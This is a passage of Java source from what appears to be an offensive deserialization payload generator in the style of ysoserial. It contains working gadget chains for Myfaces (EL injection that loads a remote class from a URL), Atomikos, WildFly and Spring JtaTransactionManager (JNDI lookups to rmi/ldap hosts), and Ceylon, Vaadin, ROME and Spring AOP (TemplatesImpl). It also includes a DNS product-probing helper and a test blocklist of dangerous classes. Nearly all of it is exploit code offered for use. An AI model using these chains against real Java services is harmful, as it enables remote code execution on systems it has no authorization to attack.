19 | *

20 | * Arguments: 21 | * - base_url:classname 22 | *

23 | * Yields: 24 | * - Instantiation of remotely loaded class 25 | *

26 | * Requires: 27 | * - MyFaces 28 | * - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized) 29 | * 30 | * @author mbechler 31 | */ 32 | @Dependencies({""}) 33 | @Authors({Authors.MBECHLER}) 34 | @Sink({Sink.EL}) 35 | public class Myfaces2 implements ObjectPayload { 36 | 37 | public static void main(String[] args) throws Exception { 38 | // PayloadRunner.run(Myfaces1.class, args); 39 | 40 | SinksHelper sinksHelper = new SinksHelper(); 41 | sinksHelper.setSink(Myfaces2.class.getAnnotation(Sink.class).value()[0]); 42 | sinksHelper.setEnchant(EnchantType.DEFAULT); 43 | sinksHelper.setCommand("open -a Calculator.app"); 44 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 45 | javaClassHelper.setExtendsAbstractTranslet(true); 46 | sinksHelper.setJavaClassHelper(javaClassHelper); 47 | 48 | PayloadRunner.run(Myfaces2.class, args, sinksHelper); 49 | } 50 | 51 | public Object getObject(SinksHelper sinksHelper) throws Exception { 52 | // sink 53 | String command = sinksHelper.getCommand(); 54 | 55 | Object kickOffObject = getChain(command); 56 | 57 | return kickOffObject; 58 | } 59 | 60 | public Object getChain(String command) throws Exception { 61 | int sep = command.lastIndexOf(':'); 62 | if (sep < 0) { 63 | throw new IllegalArgumentException("Command format is: :"); 64 | } 65 | 66 | String url = command.substring(0, sep); 67 | String className = command.substring(sep + 1); 68 | 69 | // based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/ 70 | String expr = "${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}"; 71 | 72 | // if we add fewer than the actual classloaders we end up with a null entry 73 | for (int i = 0; i < 100; i++) { 74 | expr += "${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('" + url + "').toURL())}"; 75 | } 76 | expr += "${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')" 77 | + ".toArray(request.getClass().getClassLoader().getURLs())).loadClass('" + className + "').newInstance()}"; 78 | 79 | Myfaces1 myfaces1 = new Myfaces1(); 80 | return myfaces1.getChain(expr); 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/others/Atomikos.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.others; 2 | 3 | import com.atomikos.icatch.jta.RemoteClientUserTransaction; 4 | import com.ppp.JavaClassHelper; 5 | import com.ppp.KickOff; 6 | import com.ppp.ObjectPayload; 7 | import com.ppp.annotation.Authors; 8 | import com.ppp.annotation.Dependencies; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.EnchantType; 13 | import com.ppp.sinks.annotation.Sink; 14 | import com.ppp.utils.Reflections; 15 | 16 | /** 17 | * @author Whoopsunix 18 | */ 19 | @Dependencies({"com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1"}) 20 | @Authors({Authors.PWNTESTER, Authors.SCICCONE}) 21 | @Sink({Sink.JNDI}) 22 | public class Atomikos implements ObjectPayload { 23 | public static void main(String[] args) throws Exception { 24 | SinksHelper sinksHelper = new SinksHelper(); 25 | sinksHelper.setSink(Atomikos.class.getAnnotation(Sink.class).value()[0]); 26 | sinksHelper.setEnchant(EnchantType.DEFAULT); 27 | sinksHelper.setCommand("rmi://127.0.0.1:1099/wtkwre"); 28 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 29 | javaClassHelper.setExtendsAbstractTranslet(true); 30 | sinksHelper.setJavaClassHelper(javaClassHelper); 31 | 32 | PayloadRunner.run(Atomikos.class, args, sinksHelper); 33 | } 34 | 35 | public Object getObject(SinksHelper sinksHelper) throws Exception { 36 | // sink 37 | Object sinkObject = SinkScheduler.builder(sinksHelper); 38 | 39 | Object kickOffObject = getChain((String) sinkObject); 40 | 41 | return kickOffObject; 42 | } 43 | 44 | public Object getChain(String command) throws Exception { 45 | // validate command 46 | int sep = command.lastIndexOf('/'); 47 | if (sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi"))) 48 | throw new IllegalArgumentException("Command format is: " + command 49 | + "(rmi,ldap)://[:]/"); 50 | 51 | String url = command.substring(0, sep); 52 | String className = command.substring(sep + 1); 53 | 54 | // create factory based on url 55 | String initialContextFactory; 56 | if (url.startsWith("ldap")) 57 | initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory"; 58 | else 59 | initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory"; 60 | 61 | // create object 62 | RemoteClientUserTransaction rcut = new RemoteClientUserTransaction(); 63 | 64 | // set values using reflection 65 | Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory); 66 | Reflections.setFieldValue(rcut, "providerUrl", url); 67 | Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className); 68 | 69 | return KickOff.badAttributeValueExpException(rcut); 70 | } 71 | 72 | } 73 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/others/Ceylon.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.others; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.redhat.ceylon.compiler.java.language.SerializationProxy; 11 | 12 | import javax.xml.transform.Templates; 13 | 14 | /** 15 | * @author Whoopsunix 16 | */ 17 | @Authors({Authors.KULLRICH}) 18 | @Dependencies({"org.ceylon-lang:ceylon.language:<=1.3.3"}) 19 | @Sink({Sink.TemplatesImpl}) 20 | public class Ceylon implements ObjectPayload { 21 | 22 | public static void main(String[] args) throws Exception { 23 | PayloadRunner.run(Ceylon.class, args); 24 | } 25 | 26 | public Object getObject(SinksHelper sinksHelper) throws Exception { 27 | // sink 28 | Object sinkObject = SinkScheduler.builder(sinksHelper); 29 | 30 | Object kickOffObject = getChain(sinkObject); 31 | 32 | return kickOffObject; 33 | } 34 | 35 | public Object getChain(Object templates) throws Exception { 36 | return new SerializationProxy(templates, Templates.class, "newTransformer"); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/others/Vaadin.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.others; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.vaadin.data.util.NestedMethodProperty; 12 | import com.vaadin.data.util.PropertysetItem; 13 | 14 | /** 15 | * @author Whoopsunix 16 | * todo 17 | */ 18 | @Dependencies({"com.vaadin:vaadin-server:7.7.14", "com.vaadin:vaadin-shared:7.7.14"}) 19 | @Authors({Authors.KULLRICH}) 20 | @Sink({Sink.TemplatesImpl}) 21 | public class Vaadin implements ObjectPayload { 22 | public static void main(String[] args) throws Exception { 23 | PayloadRunner.run(Vaadin.class, args); 24 | } 25 | 26 | public Object getObject(SinksHelper sinksHelper) throws Exception { 27 | // sink 28 | Object sinkObject = SinkScheduler.builder(sinksHelper); 29 | 30 | Object kickOffObject = getChain(sinkObject); 31 | 32 | return kickOffObject; 33 | } 34 | 35 | public Object getChain(Object templates) throws Exception { 36 | PropertysetItem pItem = new PropertysetItem(); 37 | 38 | NestedMethodProperty nmprop = new NestedMethodProperty(templates, "outputProperties"); 39 | pItem.addItemProperty("outputProperties", nmprop); 40 | 41 | return KickOff.badAttributeValueExpException(pItem); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/others/WildFly.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.others; 2 | 3 | /** 4 | * @author Whoopsunix 5 | */ 6 | 7 | import com.ppp.JavaClassHelper; 8 | import com.ppp.ObjectPayload; 9 | import com.ppp.annotation.Authors; 10 | import com.ppp.annotation.Dependencies; 11 | import com.ppp.secmgr.PayloadRunner; 12 | import com.ppp.sinks.SinkScheduler; 13 | import com.ppp.sinks.SinksHelper; 14 | import com.ppp.sinks.annotation.EnchantType; 15 | import com.ppp.sinks.annotation.Sink; 16 | import org.jboss.as.connector.subsystems.datasources.WildFlyDataSource; 17 | 18 | @Dependencies({"org.wildfly:wildfly-connector:26.0.1.Final"}) 19 | @Authors({Authors.HUGOW}) 20 | @Sink({Sink.JNDI}) 21 | public class WildFly implements ObjectPayload { 22 | public static void main(String[] args) throws Exception { 23 | SinksHelper sinksHelper = new SinksHelper(); 24 | sinksHelper.setSink(Atomikos.class.getAnnotation(Sink.class).value()[0]); 25 | sinksHelper.setEnchant(EnchantType.DEFAULT); 26 | sinksHelper.setCommand("rmi://127.0.0.1:1099/wtkwre"); 27 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 28 | javaClassHelper.setExtendsAbstractTranslet(true); 29 | sinksHelper.setJavaClassHelper(javaClassHelper); 30 | 31 | PayloadRunner.run(WildFly.class, args, sinksHelper); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain((String) sinkObject); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(String command) throws Exception { 44 | return new WildFlyDataSource(null, command); 45 | } 46 | 47 | } 48 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/rome/ROME.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.rome; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.Printer; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.GadgetDependency; 13 | import com.ppp.sinks.annotation.Sink; 14 | import com.sun.syndication.feed.impl.ObjectBean; 15 | 16 | import javax.xml.transform.Templates; 17 | import java.security.SignedObject; 18 | 19 | /** 20 | * @author Whoopsunix 21 | */ 22 | @Dependencies({"rome:rome:1.0"}) 23 | @Authors({Authors.MBECHLER}) 24 | @Sink({Sink.TemplatesImpl}) 25 | public class ROME implements ObjectPayload { 26 | 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(ROME.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(Templates.class, sinkObject, sinksHelper.getGadgetDependency()); 36 | 37 | // wrap 38 | if (sinksHelper.getWrapSerialization() != null) { 39 | Object signedObject = WrapSerialization.scheduler(kickOffObject, sinksHelper); 40 | kickOffObject = getChain(SignedObject.class, signedObject, sinksHelper.getGadgetDependency()); 41 | } 42 | 43 | return kickOffObject; 44 | } 45 | 46 | public Object getChain(Class cls, Object object, GadgetDependency dependency) throws Exception { 47 | if (dependency.equals(GadgetDependency.RomeTools)) { 48 | return rometools(cls, object); 49 | } else { 50 | return rome(cls, object); 51 | } 52 | } 53 | 54 | public Object rome(Class cls, Object object) throws Exception { 55 | Printer.yellowInfo("Using rome"); 56 | ObjectBean delegate = new ObjectBean(cls, object); 57 | ObjectBean root = new ObjectBean(ObjectBean.class, delegate); 58 | 59 | return KickOff.makeMap(root); 60 | } 61 | 62 | public Object rometools(Class cls, Object object) throws Exception { 63 | Printer.yellowInfo("Using romeTools"); 64 | com.rometools.rome.feed.impl.ObjectBean delegate = new com.rometools.rome.feed.impl.ObjectBean(cls, object); 65 | com.rometools.rome.feed.impl.ObjectBean root = new com.rometools.rome.feed.impl.ObjectBean(com.rometools.rome.feed.impl.ObjectBean.class, delegate); 66 | 67 | return KickOff.makeMap(root); 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/rome/ROME2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.rome; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.Printer; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.GadgetDependency; 13 | import com.ppp.sinks.annotation.Sink; 14 | import com.sun.syndication.feed.impl.ObjectBean; 15 | 16 | import javax.management.BadAttributeValueExpException; 17 | import javax.xml.transform.Templates; 18 | import java.security.SignedObject; 19 | 20 | /** 21 | * @author Whoopsunix 22 | */ 23 | @Dependencies({"rome:rome:1.0"}) 24 | @Authors({Authors.Firebasky}) 25 | @Sink({Sink.TemplatesImpl}) 26 | public class ROME2 implements ObjectPayload { 27 | 28 | public static void main(String[] args) throws Exception { 29 | PayloadRunner.run(ROME2.class, args); 30 | } 31 | 32 | public Object getObject(SinksHelper sinksHelper) throws Exception { 33 | // sink 34 | Object sinkObject = SinkScheduler.builder(sinksHelper); 35 | 36 | Object kickOffObject = getChain(Templates.class, sinkObject, sinksHelper.getGadgetDependency()); 37 | 38 | // wrap 39 | if (sinksHelper.getWrapSerialization() != null) { 40 | Object signedObject = WrapSerialization.scheduler(kickOffObject, sinksHelper); 41 | kickOffObject = getChain(SignedObject.class, signedObject, sinksHelper.getGadgetDependency()); 42 | } 43 | 44 | return kickOffObject; 45 | } 46 | 47 | public Object getChain(Class cls, Object object, GadgetDependency dependency) throws Exception { 48 | if (dependency.equals(GadgetDependency.RomeTools)) { 49 | return rometools(cls, object); 50 | } else { 51 | return rome(cls, object); 52 | } 53 | } 54 | 55 | public Object rome(Class cls, Object object) throws Exception { 56 | Printer.yellowInfo("Using rome"); 57 | ObjectBean delegate = new ObjectBean(cls, object); 58 | 59 | BadAttributeValueExpException badAttributeValueExpException = KickOff.badAttributeValueExpException(delegate); 60 | 61 | return badAttributeValueExpException; 62 | } 63 | 64 | public Object rometools(Class cls, Object object) throws Exception { 65 | Printer.yellowInfo("Using romeTools"); 66 | com.rometools.rome.feed.impl.ObjectBean delegate = new com.rometools.rome.feed.impl.ObjectBean(cls, object); 67 | 68 | BadAttributeValueExpException badAttributeValueExpException = KickOff.badAttributeValueExpException(delegate); 69 | 70 | return badAttributeValueExpException; 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/rome/ROME4.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.rome; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.Printer; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.chain.WrapSerialization; 9 | import com.ppp.secmgr.PayloadRunner; 10 | import com.ppp.sinks.SinkScheduler; 11 | import com.ppp.sinks.SinksHelper; 12 | import com.ppp.sinks.annotation.GadgetDependency; 13 | import com.ppp.sinks.annotation.Sink; 14 | import com.sun.syndication.feed.impl.EqualsBean; 15 | import com.sun.syndication.feed.impl.ToStringBean; 16 | 17 | import javax.xml.transform.Templates; 18 | import java.security.SignedObject; 19 | 20 | /** 21 | * @author Whoopsunix 22 | *

23 | * JDK8 24 | */ 25 | @Dependencies({"rome:rome:1.0", "JDK>1.8"}) 26 | @Sink({Sink.TemplatesImpl}) 27 | @Authors() 28 | public class ROME4 implements ObjectPayload { 29 | 30 | public static void main(String[] args) throws Exception { 31 | PayloadRunner.run(ROME4.class, args); 32 | } 33 | 34 | public Object getObject(SinksHelper sinksHelper) throws Exception { 35 | // sink 36 | Object sinkObject = SinkScheduler.builder(sinksHelper); 37 | 38 | Object kickOffObject = getChain(Templates.class, sinkObject, sinksHelper.getGadgetDependency()); 39 | 40 | // wrap 41 | if (sinksHelper.getWrapSerialization() != null) { 42 | Object signedObject = WrapSerialization.scheduler(kickOffObject, sinksHelper); 43 | kickOffObject = getChain(SignedObject.class, signedObject, sinksHelper.getGadgetDependency()); 44 | } 45 | 46 | return kickOffObject; 47 | } 48 | 49 | public Object getChain(Class cls, Object object, GadgetDependency dependency) throws Exception { 50 | if (dependency.equals(GadgetDependency.RomeTools)) { 51 | return rometools(cls, object); 52 | } else { 53 | return rome(cls, object); 54 | } 55 | } 56 | 57 | public Object rome(Class cls, Object object) throws Exception { 58 | Printer.yellowInfo("Using rome"); 59 | ToStringBean toStringBean = new ToStringBean(cls, object); 60 | EqualsBean root = new EqualsBean(ToStringBean.class, toStringBean); 61 | 62 | return KickOff.makeMap(root); 63 | } 64 | 65 | public Object rometools(Class cls, Object object) throws Exception { 66 | Printer.yellowInfo("Using romeTools"); 67 | com.rometools.rome.feed.impl.ToStringBean toStringBean = new com.rometools.rome.feed.impl.ToStringBean(cls, object); 68 | com.rometools.rome.feed.impl.EqualsBean root = new com.rometools.rome.feed.impl.EqualsBean(com.rometools.rome.feed.impl.ToStringBean.class, toStringBean); 69 | 70 | return KickOff.makeMap(root); 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/spring/Spring2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.spring; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Reflections; 12 | import org.springframework.aop.framework.AdvisedSupport; 13 | import org.springframework.aop.target.SingletonTargetSource; 14 | 15 | import javax.xml.transform.Templates; 16 | import java.lang.reflect.InvocationHandler; 17 | import java.lang.reflect.Type; 18 | 19 | import static java.lang.Class.forName; 20 | 21 | /** 22 | * Just a PoC to proof that the ObjectFactory stuff is not the real problem. 23 | *

24 | * Gadget chain: 25 | * TemplatesImpl.newTransformer() 26 | * Method.invoke(Object, Object...) 27 | * AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[]) 28 | * JdkDynamicAopProxy.invoke(Object, Method, Object[]) 29 | * $Proxy0.newTransformer() 30 | * Method.invoke(Object, Object...) 31 | * SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(ObjectInputStream) 32 | * 33 | * @author mbechler 34 | */ 35 | @Dependencies({ 36 | "org.springframework:spring-core:4.1.4.RELEASE", "org.springframework:spring-aop:4.1.4.RELEASE", 37 | // test deps 38 | "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2" 39 | }) 40 | @Authors({Authors.MBECHLER}) 41 | @Sink({Sink.TemplatesImpl}) 42 | public class Spring2 implements ObjectPayload { 43 | 44 | public static void main(String[] args) throws Exception { 45 | PayloadRunner.run(Spring2.class, args); 46 | } 47 | 48 | public Object getObject(SinksHelper sinksHelper) throws Exception { 49 | // sink 50 | Object sinkObject = SinkScheduler.builder(sinksHelper); 51 | 52 | Object kickOffObject = getChain(sinkObject); 53 | 54 | return kickOffObject; 55 | } 56 | 57 | public Object getChain(Object templates) throws Exception { 58 | AdvisedSupport as = new AdvisedSupport(); 59 | as.setTargetSource(new SingletonTargetSource(templates)); 60 | 61 | final Type typeTemplatesProxy = KickOff.createProxy( 62 | (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as), 63 | Type.class, 64 | Templates.class); 65 | 66 | final Object typeProviderProxy = KickOff.createMemoitizedProxy( 67 | KickOff.createMap("getType", typeTemplatesProxy), 68 | forName("org.springframework.core.SerializableTypeWrapper$TypeProvider")); 69 | 70 | Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider")); 71 | Reflections.setFieldValue(mitp, "provider", typeProviderProxy); 72 | Reflections.setFieldValue(mitp, "methodName", "newTransformer"); 73 | return mitp; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/spring/Spring3.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.spring; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.chain.others.Atomikos; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinkScheduler; 10 | import com.ppp.sinks.SinksHelper; 11 | import com.ppp.sinks.annotation.EnchantType; 12 | import com.ppp.sinks.annotation.Sink; 13 | import org.springframework.transaction.jta.JtaTransactionManager; 14 | 15 | @Dependencies({ 16 | "org.springframework:spring-tx:4.1.4.RELEASE", 17 | "org.springframework:spring-context:4.1.4.RELEASE", 18 | "javax.transaction:jta:1.1" 19 | }) 20 | @Authors({Authors.ZEROTHOUGHTS, Authors.SCICCONE}) 21 | @Sink({Sink.JNDI}) 22 | public class Spring3 implements ObjectPayload { 23 | 24 | public static void main(String[] args) throws Exception { 25 | SinksHelper sinksHelper = new SinksHelper(); 26 | sinksHelper.setSink(Atomikos.class.getAnnotation(Sink.class).value()[0]); 27 | sinksHelper.setEnchant(EnchantType.DEFAULT); 28 | sinksHelper.setCommand("rmi://127.0.0.1:1099/wtkwre"); 29 | JavaClassHelper javaClassHelper = new JavaClassHelper(); 30 | javaClassHelper.setExtendsAbstractTranslet(true); 31 | sinksHelper.setJavaClassHelper(javaClassHelper); 32 | 33 | PayloadRunner.run(Spring3.class, args, sinksHelper); 34 | } 35 | 36 | public Object getObject(SinksHelper sinksHelper) throws Exception { 37 | // sink 38 | Object sinkObject = SinkScheduler.builder(sinksHelper); 39 | 40 | Object kickOffObject = getChain((String) sinkObject); 41 | 42 | return kickOffObject; 43 | } 44 | 45 | public Object getChain(String command) throws Exception { 46 | JtaTransactionManager jta = new JtaTransactionManager(); 47 | jta.setUserTransactionName(command); 48 | return jta; 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/urldns/DNSHelper.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.urldns; 2 | 3 | import java.util.ArrayList; 4 | 5 | /** 6 | * @author Whoopsunix 7 | *

8 | * URLDNS 9 | */ 10 | public class DNSHelper { 11 | private String host; 12 | private Product[] products; 13 | 14 | /** 15 | * 自定义 16 | */ 17 | private String className; 18 | private String subdomain; 19 | 20 | public DNSHelper() { 21 | this.products = new Product[]{}; 22 | } 23 | 24 | public String getHost() { 25 | return host; 26 | } 27 | 28 | public void setHost(String host) { 29 | this.host = host; 30 | } 31 | 32 | public Product[] getProducts() { 33 | return products; 34 | } 35 | 36 | public void setProducts(Product[] products) { 37 | this.products = products; 38 | } 39 | 40 | public String getClassName() { 41 | return className; 42 | } 43 | 44 | public void setClassName(String className) { 45 | this.className = className; 46 | } 47 | 48 | public String getSubdomain() { 49 | return subdomain; 50 | } 51 | 52 | public void setSubdomain(String subdomain) { 53 | this.subdomain = subdomain; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/urldns/Product.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.urldns; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.util.Arrays; 6 | 7 | /** 8 | * @author Whoopsunix 9 | */ 10 | public enum Product { 11 | // JDK 12 | BCEL("bcel", "bcel"), 13 | JDK7u21("JDK7u21", "JDK7u21"), 14 | JDK8u20("JDK8u20", "JDK8u20"), 15 | OS("os", "os"), 16 | 17 | // 组件 18 | CommonsCollections3("cc3", "CommonsCollections3"), 19 | CommonsCollections4("cc4", "CommonsCollections4"), 20 | CommonsBeanutils("cb", "CommonsBeanutils"), 21 | C3P0("c3p0", "c3p0"), 22 | Bsh("bsh", "bsh"), 23 | Groovy("Groovy", "Groovy"), 24 | ROME("ROME", "ROME"), 25 | Fastjson("Fastjson", "Fastjson"), 26 | Jackson("Jackson", "Jackson"), 27 | SpringAOP("SpringAOP", "SpringAOP"), 28 | AspectJWeaver("ajw", "AspectJWeaver"), 29 | ; 30 | 31 | private final String product; 32 | private final String longProduct; 33 | 34 | Product(String product, String longProduct) { 35 | this.product = product; 36 | this.longProduct = longProduct; 37 | } 38 | 39 | public String getProduct() { 40 | return product; 41 | } 42 | 43 | public String getLongProduct() { 44 | return longProduct; 45 | } 46 | 47 | public static Product getProduct(String product) { 48 | for (Product p : Product.values()) { 49 | if (p.getProduct().equalsIgnoreCase(product) || p.getLongProduct().equalsIgnoreCase(product)) { 50 | return p; 51 | } 52 | } 53 | Printer.warn("Product not found: " + product); 54 | Product.show(); 55 | return null; 56 | } 57 | 58 | public static void show() { 59 | Printer.blueInfo("Current support products: " + Arrays.toString(Product.values())); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/secmgr/BlackInputStream.java: -------------------------------------------------------------------------------- 1 | package com.ppp.secmgr; 2 | 3 | import java.io.*; 4 | import java.util.HashSet; 5 | import java.util.Set; 6 | 7 | public class BlackInputStream extends ObjectInputStream { 8 | private Set blackList = new HashSet() { 9 | { 10 | add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); 11 | add("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter"); 12 | add("org.apache.commons.collections.functors.InvokerTransformer"); 13 | // add("java.security.SignedObject"); 14 | } 15 | }; 16 | 17 | public BlackInputStream(InputStream in) throws IOException { 18 | super(in); 19 | } 20 | 21 | 22 | protected Class resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException { 23 | System.out.println(cls); 24 | if (blackList.contains(cls.getName())) { 25 | throw new InvalidClassException("Unexpected serialized class", cls.getName()); 26 | } else { 27 | return super.resolveClass(cls); 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/secmgr/ExecCheckingSecurityManager.java: -------------------------------------------------------------------------------- 1 | package com.ppp.secmgr; 2 | 3 | import java.security.Permission; 4 | import java.util.Collections; 5 | import java.util.LinkedList; 6 | import java.util.List; 7 | import java.util.concurrent.Callable; 8 | 9 | public class ExecCheckingSecurityManager extends SecurityManager { 10 | public ExecCheckingSecurityManager() { 11 | this(true); 12 | } 13 | 14 | public ExecCheckingSecurityManager(boolean throwException) { 15 | this.throwException = throwException; 16 | } 17 | 18 | private final boolean throwException; 19 | 20 | private final List cmds = new LinkedList(); 21 | 22 | public List getCmds() { 23 | return Collections.unmodifiableList(cmds); 24 | } 25 | 26 | @Override 27 | public void checkPermission(final Permission perm) { 28 | } 29 | 30 | @Override 31 | public void checkPermission(final Permission perm, final Object context) { 32 | } 33 | 34 | @Override 35 | public void checkExec(final String cmd) { 36 | super.checkExec(cmd); 37 | 38 | cmds.add(cmd); 39 | 40 | if (throwException) { 41 | // throw a special exception to ensure we can detect exec() in the test 42 | throw new ExecException(cmd); 43 | } 44 | } 45 | 46 | ; 47 | 48 | @SuppressWarnings("serial") 49 | public static class ExecException extends RuntimeException { 50 | private final String threadName = Thread.currentThread().getName(); 51 | private final String cmd; 52 | 53 | public ExecException(String cmd) { 54 | this.cmd = cmd; 55 | } 56 | 57 | public String getCmd() { 58 | return cmd; 59 | } 60 | 61 | public String getThreadName() { 62 | return threadName; 63 | } 64 | 65 | @ 66 | Override 67 | public String getMessage() { 68 | return "executed `" + getCmd() + "` in [" + getThreadName() + "]"; 69 | } 70 | } 71 | 72 | public void callWrapped(final Runnable runnable) throws Exception { 73 | callWrapped(new Callable() { 74 | public Void call() throws Exception { 75 | runnable.run(); 76 | return null; 77 | } 78 | }); 79 | } 80 | 81 | public T callWrapped(final Callable callable) throws Exception { 82 | SecurityManager sm = System.getSecurityManager(); // save sm 83 | System.setSecurityManager(this); 84 | try { 85 | T result = callable.call(); 86 | if (throwException && !getCmds().isEmpty()) { 87 | throw new ExecException(getCmds().get(0)); 88 | } 89 | return result; 90 | } catch (Exception e) { 91 | if (!(e instanceof ExecException) && throwException && !getCmds().isEmpty()) { 92 | throw e; 93 | // throw new ExecException(getCmds().get(0)); 94 | } else { 95 | throw e; 96 | } 97 | } finally { 98 | System.setSecurityManager(sm); // restore sm 99 | } 100 | } 101 | } 102 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/Default.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks; 2 | 3 | import com.ppp.Printer; 4 | import com.ppp.sinks.annotation.EnchantType; 5 | import com.ppp.sinks.annotation.Sink; 6 | 7 | import java.io.FileInputStream; 8 | 9 | /** 10 | * @author Whoopsunix 11 | *

